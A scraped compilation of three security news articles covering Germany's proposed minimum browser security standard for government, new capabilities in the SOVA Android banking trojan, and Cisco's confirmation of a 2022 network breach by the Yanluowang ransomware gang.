The proposed standard covers both desktop and mobile browsers, whereas previous security guidance only applied to desktop browsers on government PCs and workstations.

Read more of the latest browser security news

Following the consultation, the BSI expects the minimum standard to be mandated across government systems. The move will bar federal employees from using non-compliant browsers, such as the now-deprecated Internet Explorer, on government business.

Most of the security and privacy technologies prescribed by the BSI are available in most modern browsers. These include supporting certificates to the X.509 standard, encrypting connections to the server, and supporting for HSTS (HTTP Strict Transport Security).

Browsers also need to support a mechanism for automatic updates, with updates only carried out if an integrity check is successful. And they must implement a same-origin policy (SOP), so that documents and scripts cannot access resources, such as text and graphics, from other websites.

**‘Very encouraging’**

“The minimum standards being put forward by the BSI are very encouraging,” Simon Backwell, information security manager at Benefex and a member of the ISACA Emerging Trends Working Group, told The Daily Swig.

“Many of these standards are already what companies look for in software, so to extend them to browsers too ensures that organizations, especially government agencies or private sector companies within Germany, consider all aspects of their working environments. Most, if not all, modern browsers meet the standards, so there should be limited impact for organizations running these.”

And, as many browsers are based on the same core code – from Google’s open source Chromium project – government agencies will find it easy to comply.

YOU MAY ALSO LIKE Chromium site isolation bypass allows wide range of attacks on browsers

“All modern browsers are already very secure (ignoring privacy), with most of them sharing the exact same engine and therefore sharing the same security features and encryption capabilities,” Tarquin Wilton Jones, a developer and security expert at browser company Vivaldi, told The Daily Swig.

“In general, browsers have been at the forefront of making secure connections, and implementing security features such as sandboxing.”

The move is, he added, aimed more at improving security in government IT than at changing the way browsers are designed. However, he cautioned that the way some browsers do not allow users to turn off telemetry or vendor tracking data could cause compliance issues.

Interested parties in Germany have until 19 August to respond to the consultation.

RELATED Microsoft Edge deepens defenses against malicious websites with enhanced security mode

Germany to mandate minimum security standards for web browsers in government

The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out.
That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept

The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out.

That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept two-factor authentication (2FA) codes, steal cookies, and expand its targeting to cover Australia, Brazil, China, India, the Philippines, and the U.K.

SOVA, meaning Owl in Russian, came to light in September 2021 when it was observed striking financial and shopping apps from the U.S. and Spain for harvesting credentials through overlay attacks by taking advantage of Android's Accessibility services.

In less than a year, the trojan has also acted as a foundation for another Android malware called MaliBot that's designed to target online banking and cryptocurrency wallet customers in Spain and Italy.

The latest variant of SOVA, dubbed v4 by Cleafy, conceals itself within fake applications that feature logos of legitimate apps like Amazon and Google Chrome to deceive users into installing them. Other notable improvements include capturing screenshots and recording the device screens.

"These features, combined with Accessibility services, enable \[threat actors\] to perform gestures and, consequently, fraudulent activities from the infected device, as we have already seen in other Android Banking Trojans (e.g. Oscorp or BRATA)," Cleafy researchers Francesco Iubatti and Federico Valentini said.

SOVA v4 is also notable for its effort to gather sensitive information from Binance and Trust Wallet, such as account balances and seed phrases. What's more, all the 13 Russian and Ukraine-based banking apps that were targeted by the malware have since been removed from the version.

To make matters worse, the update enables the malware to leverage its wide-ranging permissions to deflect uninstallation attempts by redirecting the victim to the home screen and displaying the toast message "This app is secured."

The banking trojan, feature-rich as it is, is also expected to incorporate a ransomware component in the next iteration, which is currently under development and aims to encrypt all files stored in the infected device using AES and rename them with the extension ".enc."

The enhancement is also likely to make SOVA a formidable threat in the mobile threat landscape.

"The ransomware feature is quite interesting as it's still not a common one in the Android banking trojans landscape," the researchers said. "It strongly leverages on the opportunity that has arisen in recent years, as mobile devices became for most people the central storage for personal and business data."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

SOVA Android Banking Trojan Returns With New Capabilities and Targets

By Deeba Ahmed
Cisco has confirmed that its security was successfully breached by Yanluowang Ransomware Gang in May 2022. Networking giant…
This is a post from HackRead.com Read the original post: Cisco Confirms Network Breach After Employee’s Google Account was Hacked

****Cisco has confirmed that its security was successfully breached by Yanluowang Ransomware Gang in May 2022.****

Networking giant Cisco Systems is the latest victim of hacking. The company confirmed that attackers used a compromised Google account of one of its employees after the Yanluowang ransomware gang added a list of files obtained from the company on their data leak site.

**Hacking Details**

On Wednesday, August 10th, 2022, Cisco Systems confirmed experiencing a cyberattack that took place on 24 May 2022. Sharing their findings, the networking equipment provider stated that the attackers obtained details of an employee’s private Google account, which contained passwords synced with Cisco’s web browser.

The attackers obtained initial access to **its VPN** after successfully compromising the Google account. The credentials were synced through the Chrome browser, where the targeted employee had also stored their Cisco credentials.

Consequently, attackers could synchronize their Google accounts using this information. On August 10th, the Yanluowang ransomware gang indirectly took responsibility for the breach by publishing files stolen in the data leak.

Yanluowang ransomware gang’s website (Image: Hackread.com)

**Investigation of the “Potential Compromise”**

Cisco Talos launched an investigation into the May hack and referred to it as a “potential compromise” in its detailed **report** published Wednesday. Cisco Talos threat research team conducted the investigation.

Forensic details confirmed the involvement of the Yanluowang threat group, which has ties with **Lapsus$** and **UNC2447** cybercrime groups. For your information, Lapsus$ was behind some of the most high-profile data breaches in recent months including **Microsoft**, **Okta**, **T-Mobile**, **Samsung**, and **Ubisoft**.

As for the Cisco breach, the researchers concluded that the attackers couldn’t deploy ransomware successfully but were indeed successful in penetrating its network and planting an array of hacking tools. The attacks, according to researchers, also scanned the company’s internal network, a common practice adopted before deploying ransomware.

**How Attackers Bypassed MFA?**

Cisco said that hackers used various techniques to bypass the multifactor authentication feature linked to the VPN client. This includes voice phishing (aka **vishing**) and MFA fatigue. In MFA fatigue, attackers send push requests in high volume to their targeted device so the user has no choice but to accept to stop the incoming notifications.

Cisco Talos threat researchers identified that Multi-factor Authentication **(MFA) spoofing attacks** were launched against their employees, which were eventually successful, and they could run the VPN software. After obtaining initial access, they enrolled various new devices for MFA and authenticated them successfully to the company’s VPN.

> Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.
> 
> Cisco Talos threat researchers

The attacker then accelerated to administrative privileges. Afterward, they could log in to multiple systems. This raised suspicion, and Cisco Security Incident Response Team intervened to mitigate the threat.

Further digging revealed that the ransomware gang used remote access and offensive security tools in the attack. These tools included the following:

*   **TeamViewer**
*   **LogMein** (Now GoTo)

*   **Mimikatz**
*   **Impacket**
*   **PowerSploit**
*   **Cobalt Strike**

Cisco then implemented password reset across the company networks and disclosed their findings in the report. The company has created two Clam AntiVirus signatures to prevent additional compromise.

Tag

#chrome